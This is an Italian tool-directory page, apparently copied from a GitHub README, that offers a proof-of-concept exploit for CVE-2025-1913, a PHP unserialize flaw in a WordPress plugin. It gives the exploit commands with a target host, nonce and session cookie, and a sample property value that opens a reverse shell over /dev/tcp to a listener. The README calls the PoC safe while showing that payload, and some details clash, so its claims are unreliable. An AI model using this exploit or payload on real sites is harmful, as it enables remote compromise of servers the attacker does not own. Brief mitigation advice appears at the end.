Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1913-PoC — Un PoC che dimostra CVE-2025-1913, mostrando come la gestione non sicura di unserialize del plugin possa portare a comportamenti ad alto impatto in ambienti controllati. Contiene un payload dannoso solo per test autorizzati. Da usare esclusivamente in laboratori isolati e per ricerca difensiva. | Kitploit
Strumenti/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
218 mesi faNon ancora revisionato

Informazioni

Un PoC che dimostra CVE-2025-1913, mostrando come la gestione non sicura di unserialize del plugin possa portare a comportamenti ad alto impatto in ambienti controllati. Contiene un payload dannoso solo per test autorizzati. Da usare esclusivamente in laboratori isolati e per ricerca difensiva.

Condividi

CVE-2025-1913 -- Prova di Concerto (PoC)

Questo repository contiene una Prova di Concetto (PoC) solo a scopo educativo
per CVE-2025-1913, creata da Suhaib518 🇸🇦.
Questa PoC dimostra come un input PHP serializzato appositamente creato possa attivare logiche vulnerabili in componenti WordPress interessati.
La PoC è sicura e non include payload dannosi.

⚠️ Avvertenza:
Questa PoC è solo per apprendimento, ricerca e test difensivi.
NON utilizzarla su server di cui non sei proprietario o per cui non hai esplicito permesso di test.


📌 Panoramica

La vulnerabilità esiste a causa della gestione non sicura dei dati serializzati PHP in alcuni flussi di lavoro di plugin WordPress.
Questa PoC mostra come un attaccante potrebbe fornire strutture serializzate appositamente create che causano comportamenti interni indesiderati.

Questo repository include uno script Python che:

  • Crea oggetti PHP serializzati personalizzati
  • Li codifica per endpoint AJAX di esportazione di WordPress
  • Invia una richiesta controllata per dimostrare l'issue in modo sicuro

📂 File in Questo Repository

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # Lo script PoC creato da Suhaib518 KSA
└── README.md                    # Documentazione

🚀 Utilizzo

1. Installa i Requisiti

Lo script utilizza solo moduli Python integrati tranne requests:

root@kitploit:~
pip install requests

2. Esegui lo script exploit interattivo

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

Ti verrà chiesto:

  • Quante proprietà includere
  • Il nome/valore per ogni proprietà

Lo script quindi le serializzerà, costruirà una richiesta WordPress e la invierà.


✔️ Comando di Esempio (Flusso di Sfruttamento Riuscito)

Di seguito è riportato un comando di esempio che mostra l'utilizzo con valori di esempio (questi non sono malevoli, mostrano solo il processo):

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

Esempi di risposte alle domande interattive:

root@kitploit:~
[?] How many properties does this class have? 2
[?] Name of property #1: file
[?] Value for 'file': shell.sh
[?] Name of property #2: shell
[?] Value for 'shell': sh -i >& /dev/tcp/IP/PORT 0>&1

Lo script quindi stamperà:

root@kitploit:~
[*] Sending request…
....Check the listener for the shell.

🛡️ Mitigazione (Alto Livello)

  • Evita di usare unserialize() su input non fidati
  • Convalida tutti i parametri dei form e le richieste AJAX
  • Mantieni i plugin aggiornati
  • Utilizza formati di dati moderni come JSON invece della serializzazione PHP

📜 Licenza

Licenza MIT.


🙌 Autore

Creato da Suhaib518 🇸🇦.

Scarica lo strumento